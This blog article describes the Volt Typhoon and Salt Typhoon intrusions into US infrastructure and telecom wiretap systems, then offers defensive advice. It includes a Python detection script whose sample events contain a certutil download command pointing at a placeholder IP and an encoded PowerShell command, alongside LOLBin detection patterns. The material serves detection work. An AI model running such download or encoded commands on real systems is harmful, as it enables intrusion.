Volt Typhoon and Salt Typhoon: China's Pre-Positioned Hackers Are Inside US Power Grids and Telecoms

Abhishek Gautam · 9 min read

Quick summary

FBI and CISA confirmed Chinese state hackers Volt Typhoon and Salt Typhoon have been dormant inside US power grids, water systems, and telecoms for years. Here is what happened, why it matters, and what infrastructure teams must do now.

Two Chinese state-sponsored hacking groups have been quietly inside American critical infrastructure for years. Not stealing data. Not causing outages. Just waiting.

That is the conclusion from the FBI, CISA, NSA, and intelligence agencies across Five Eyes nations after an extended joint investigation. The groups — dubbed Volt Typhoon and Salt Typhoon by Microsoft and CrowdStrike respectively — represent the most serious confirmed penetration of US infrastructure by a foreign adversary since at least the Cold War.

In March 2026, with US-China tensions elevated following the Hormuz conflict and semiconductor export restrictions, the question of what these groups are positioned to do is no longer theoretical.

Volt Typhoon: Inside Power, Water, and Communications

Volt Typhoon (also tracked as Bronze Silhouette and Vanguard Panda) was first publicly attributed by Microsoft in May 2023. CISA advisory AA24-038A, published February 2024, confirmed that Volt Typhoon had maintained persistent access inside US critical infrastructure — including energy, water, communications, and transportation sectors — for at least five years.

FBI Director Christopher Wray testified to the House Select Committee on the Chinese Communist Party in January 2024: "China's hackers are positioning on American infrastructure in preparation to wreak havoc and cause real-world harm to American citizens and communities, if or when China decides the time has come to strike."

The targets are not financial. Volt Typhoon is not exfiltrating intellectual property or selling access on darknet markets. The targets are operational: the systems that keep the lights on, water flowing, and communications running.

What they compromised:

  • Electric utilities in multiple US states (grid operational technology networks)
  • Water treatment facilities (SCADA and ICS systems)
  • Oil and natural gas pipelines (operational technology adjacent to control systems)
  • Commercial satellite communications providers
  • US military logistics contractors and port authorities

How they got in — "Living Off the Land":

The defining characteristic of Volt Typhoon is the absence of custom malware. The group uses legitimate system tools already present on compromised machines — Windows Management Instrumentation (WMI), PowerShell, ntdsutil, netsh — to blend in with normal administrative traffic. This is called "living off the land" (LOTL) and it makes detection extremely difficult.

No novel exploit. No zero-day. Just patient, methodical use of standard admin tools under stolen credentials. Volt Typhoon typically gains initial access through internet-facing devices — FortiGate firewalls, Cisco routers, NETGEAR appliances — that are unpatched or misconfigured. From there, they move laterally and establish persistence without ever deploying a traditional backdoor.

Salt Typhoon: Inside US Telecoms and the Wiretap System

Salt Typhoon (also tracked as Earth Estries and GhostEmperor) is a separate group with a different focus: telecommunications infrastructure. Where Volt Typhoon targets operational technology, Salt Typhoon targets the lawful intercept systems that US law enforcement uses to conduct court-ordered wiretaps.

In October 2024, the Wall Street Journal reported that Salt Typhoon had breached AT&T, Verizon, and Lumen Technologies. By November 2024, the FCC held an emergency closed-door meeting on the intrusions. The final confirmed count was eight major US telecoms breached — including T-Mobile.

The access Salt Typhoon gained was to CALEA (Communications Assistance for Law Enforcement Act) infrastructure — the backend systems that let law enforcement intercept communications under court order. This means Chinese intelligence potentially had access to a list of who US law enforcement was actively surveilling. The counterintelligence implications are severe: any Chinese assets or intermediaries under FBI surveillance could have been tipped off through the information obtained from these systems.

What Salt Typhoon accessed:

  • Call metadata (who called whom, when, for how long) for millions of Americans
  • A subset of actual call and message content for targets of interest
  • The names and identities of US persons under active law enforcement surveillance
  • Internal telecom network topology and routing infrastructure

The breach was not detected by the telecoms themselves. It was identified by an intelligence tip — suggesting Salt Typhoon was inside these networks for an extended period before discovery.

Why Pre-Positioning Matters More Than Immediate Damage

Both Volt Typhoon and Salt Typhoon appear to be operating under a doctrine of strategic patience. The goal is not to cause disruption today. The goal is to have the capability to cause disruption at a moment of geopolitical crisis — a Taiwan conflict, a trade war escalation, a military confrontation.

General Timothy Haugh, director of NSA and Cyber Command, said in congressional testimony that Volt Typhoon's positioning represents "pre-positioning for disruption or destruction" rather than espionage. This is a fundamentally different threat model than data theft.

The scenario US defense planners fear: China initiates military action against Taiwan, and simultaneously activates pre-positioned access to create blackouts, water outages, and communications disruptions inside the continental United States to distract from military response and erode public support for intervention.

This is not hypothetical. Russia demonstrated a version of this playbook in Ukraine — Sandworm pre-positioned in Ukrainian infrastructure before the 2022 invasion and used that access to take down power grids in the opening days of conflict.

The 2026 Context

The strategic environment has deteriorated since the initial disclosures. US-China relations in March 2026 are at their most adversarial since at least the Korean War era. The Hormuz conflict, semiconductor export restrictions on Chinese companies, and Congressional legislation treating China as a strategic competitor have all elevated tensions.

CISA issued a supplementary advisory in February 2026 noting that Volt Typhoon activity had intensified since mid-2025, with new indicators of compromise identified in the water and communications sectors. The advisory characterised the heightened activity as consistent with "pre-conflict positioning."

What Infrastructure and Security Teams Must Do

Patch internet-facing devices immediately. Volt Typhoon's most common initial access vector is unpatched edge devices. FortiGate, Cisco IOS, Citrix ADC, and NETGEAR routers with known CVEs published in 2023-2024 are the most common entry points. If you manage any of these, check patch levels today.

Audit for LOTL indicators. The CISA AA24-038A advisory includes detailed indicators of compromise and YARA rules. Key behavioural indicators include: ntdsutil running on non-domain controllers, unusual WMI subscriptions, PowerShell encoded command execution to IP addresses, and LOLBin usage (certutil, mshta, regsvr32) in unusual contexts.
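As an added illustration of that audit (not code from the advisory or the author), the script below runs three of the listed behavioural checks over constructed process-creation events shaped like Windows 4688 / Sysmon event 1 records: ntdsutil on a host that is not a domain controller, an encoded PowerShell command whose decoded script contains an IP address, and a LOLBin (certutil, mshta, regsvr32) invoked with a remote target. Host names, roles and command lines are made up; the roles would normally come from a CMDB or AD lookup.

```python
import base64
import re

# Constructed sample events (fields modelled on 4688 / Sysmon 1); all values are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC = base64.b64encode("Test-NetConnection 203.0.113.5 -Port 445".encode("utf-16-le")).decode()
EVENTS = [
    {"host": "dc01", "role": "domain_controller", "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": "ntdsutil.exe snapshot"},
    {"host": "ws-eng-17", "role": "workstation", "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": "ntdsutil.exe snapshot"},
    {"host": "hmi-02", "role": "ot_hmi", "image": PS, "cmdline": "powershell.exe -NoP -enc " + ENC},
    {"host": "ws-eng-17", "role": "workstation", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://203.0.113.9/a.txt a.txt"},
    {"host": "ws-eng-17", "role": "workstation", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -hashfile setup.msi SHA256"},  # benign use, must not fire
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe"}

def decode_encoded_powershell(cmdline):
    """Return the decoded script behind a -e/-enc/-EncodedCommand argument, else None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")  # PowerShell encodes UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None

def check_event(ev):
    """Return the indicator names triggered by one process-creation event."""
    hits = []
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"]
    if image == "ntdsutil.exe" and ev["role"] != "domain_controller":
        hits.append("ntdsutil_on_non_dc")
    if image == "powershell.exe":
        script = decode_encoded_powershell(cmd)
        if script and IPV4.search(script):
            hits.append("encoded_powershell_to_ip")
    if image in LOLBINS and (IPV4.search(cmd) or re.search(r"https?://", cmd, re.I)):
        hits.append("lolbin_with_remote_target")
    return hits

def scan(events):
    """Map host -> sorted indicator names, for hosts with at least one hit."""
    findings = {}
    for ev in events:
        for hit in check_event(ev):
            findings.setdefault(ev["host"], set()).add(hit)
    return {host: sorted(hits) for host, hits in findings.items()}

if __name__ == "__main__":
    for host, hits in scan(EVENTS).items():
        print(host, hits)
```

A host that trips more than one indicator (ws-eng-17 above) is the one to triage first; the benign certutil hash check and the legitimate ntdsutil run on the domain controller produce no findings.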

Segment OT from IT networks. This is the single most effective control against lateral movement from IT networks into operational technology. Enforce physical or logical air gaps with strict allow-list firewall rules between IT and OT. Many of the compromised utilities had insufficient segmentation.

Monitor for credential abuse. Volt Typhoon uses legitimate credentials extensively. Privileged Identity Management (PIM) solutions, Privileged Access Workstations (PAW), and anomalous login detection (unusual hours, unusual source IPs for service accounts) are essential.

For telecoms specifically: Audit CALEA infrastructure access logs. Salt Typhoon used legitimate access to lawful intercept systems — meaning the intrusion may look like normal law enforcement portal activity. Access reviews and anomaly detection on this infrastructure are critical.

The bottom line: Volt Typhoon and Salt Typhoon are not traditional hackers. They are the digital equivalent of special forces pre-positioned behind enemy lines. The infrastructure they have compromised may look normal today. Whether it stays that way depends on decisions made in Beijing, not Washington.


Written by

Abhishek Gautam

Full Stack Developer & Software Engineer based in Delhi, India. Building web applications and SaaS products with React, Next.js, Node.js, and TypeScript. 8+ projects deployed across 7+ countries.